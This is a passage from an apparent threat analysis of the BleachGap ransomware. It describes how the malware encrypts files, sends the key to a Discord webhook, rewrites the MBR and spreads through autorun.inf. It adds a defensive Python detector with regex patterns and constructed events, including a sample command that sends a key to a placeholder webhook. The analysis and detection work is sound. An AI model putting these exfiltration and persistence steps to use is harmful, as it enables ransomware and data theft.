Researchers captured a ransomware family named BleachGap that includes a removable-media spreading function. The ransomware first appeared in February 2021 and has gone through multiple iterations.
BleachGap ransomware has multiple functions, such as adding auto-start entries, creating scheduled tasks, rewriting the MBR, disabling keyboard keys, and spreading through removable media. It uses the AES-256 symmetric encryption algorithm to encrypt files; because the same key encrypts and decrypts, files can be decrypted quickly once the key is known. Ransomware functionality is no longer limited to encrypting files: this family has begun attempting to spread laterally through removable media.
After BleachGap runs, it drops three files to the %Temp% path: a batch script named with four random characters (“<four random characters>.bat”), “aescrypt.exe”, and “DiscordSendWebhook.exe”. The batch script then performs the following steps:
(1) The batch script generates a key with a custom random algorithm and calls “aescrypt.exe” to encrypt files;
(2) It calls “DiscordSendWebhook.exe” to send the user name, the encryption key and other information to a Discord server through a webhook;
(3) It downloads “gameover.exe”, renames it to “final.exe”, and runs it, which rewrites the MBR;
(4) It creates an “autorun.inf” file in the root directory of the disk so that the batch script is started automatically from removable media;
(5) It creates and executes “p2d.bat”.
“p2d.bat” creates 100 ransom notes named “Pay2Decrypt(1-100).txt” on the desktop.
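The behaviour chain above (tools dropped into %Temp%, key exfiltration to a Discord webhook, autorun.inf written to a drive root, a burst of Pay2Decrypt notes) gives a defender several host-level indicators. The following is an added detection example written for this page; it is not code from the original analysis or from the malware. It runs over constructed events shaped like Sysmon process-create and file-create records. The exact command-line forms, the webhook URL, the host names and the “Pay2Decrypt<N>.txt” note naming are assumptions made for the example.

```python
"""Heuristic detection for the BleachGap behaviour chain described above.
Added example: events below are constructed, not real telemetry."""
import re
from collections import defaultdict

# Tool names come from the description above; "final.exe" is the renamed MBR wiper.
DROPPED_NAMES = {"aescrypt.exe", "discordsendwebhook.exe", "final.exe"}
TEMP_DIR_RE = re.compile(r"\\(AppData\\Local\\Temp|Windows\\Temp)\\", re.IGNORECASE)
# autorun.inf directly under a drive letter, e.g. E:\autorun.inf (removable media root).
AUTORUN_ROOT_RE = re.compile(r"^[A-Za-z]:\\autorun\.inf$", re.IGNORECASE)
WEBHOOK_RE = re.compile(r"https?://(?:\w+\.)?discord(?:app)?\.com/api/webhooks/", re.IGNORECASE)
# Assumed note naming: Pay2Decrypt1.txt ... Pay2Decrypt100.txt (parentheses tolerated).
NOTE_RE = re.compile(r"\\Pay2Decrypt\(?\d{1,3}\)?\.txt$", re.IGNORECASE)

# Constructed sample events: WS01 shows the full chain, WS02 is benign noise.
EVENTS = [
    {"type": "process", "host": "WS01",
     "image": r"C:\Users\bob\AppData\Local\Temp\aescrypt.exe",
     "cmd": r'aescrypt.exe -e -p Q7fKz93L "C:\Users\bob\Documents\report.docx"'},
    {"type": "process", "host": "WS01",
     "image": r"C:\Users\bob\AppData\Local\Temp\DiscordSendWebhook.exe",
     "cmd": "DiscordSendWebhook.exe https://discord.com/api/webhooks/000/constructed-token bob Q7fKz93L"},
    {"type": "file", "host": "WS01", "path": r"E:\autorun.inf"},
    {"type": "process", "host": "WS02",
     "image": r"C:\Windows\System32\notepad.exe", "cmd": "notepad.exe"},
    {"type": "file", "host": "WS02", "path": r"D:\games\autorun.inf"},  # not at a drive root
] + [
    {"type": "file", "host": "WS01", "path": rf"C:\Users\bob\Desktop\Pay2Decrypt{i}.txt"}
    for i in range(1, 101)
]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def dropped_from_temp(image):
    """Known BleachGap tool name executing out of a Temp directory."""
    return basename(image) in DROPPED_NAMES and bool(TEMP_DIR_RE.search(image))


def autorun_at_drive_root(path):
    return bool(AUTORUN_ROOT_RE.match(path))


def webhook_in_cmdline(cmd):
    """Discord webhook URL on a command line: the key-exfiltration step."""
    return bool(WEBHOOK_RE.search(cmd))


def classify(events, note_threshold=10):
    """Return {host: sorted indicator names} for every host with at least one hit."""
    hits = defaultdict(set)
    notes = defaultdict(int)
    for ev in events:
        host = ev["host"]
        if ev["type"] == "process":
            if dropped_from_temp(ev["image"]):
                hits[host].add("tool_dropped_in_temp")
            if webhook_in_cmdline(ev["cmd"]):
                hits[host].add("discord_webhook_exfil")
        elif ev["type"] == "file":
            if autorun_at_drive_root(ev["path"]):
                hits[host].add("autorun_inf_at_root")
            if NOTE_RE.search(ev["path"]):
                notes[host] += 1
    # A single note is noise; the family writes 100, so a burst is the signal.
    for host, count in notes.items():
        if count >= note_threshold:
            hits[host].add("ransom_note_burst")
    return {host: sorted(names) for host, names in hits.items()}


if __name__ == "__main__":
    for host, indicators in classify(EVENTS).items():
        print(host, indicators)
```

Because the script sends the key to the webhook in clear command-line arguments, a captured process-create event or proxy log for that request may contain the AES key; preserving that telemetry is worth more than any of the individual indicators above.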
The malicious code rewrites the MBR and locks the computer at boot: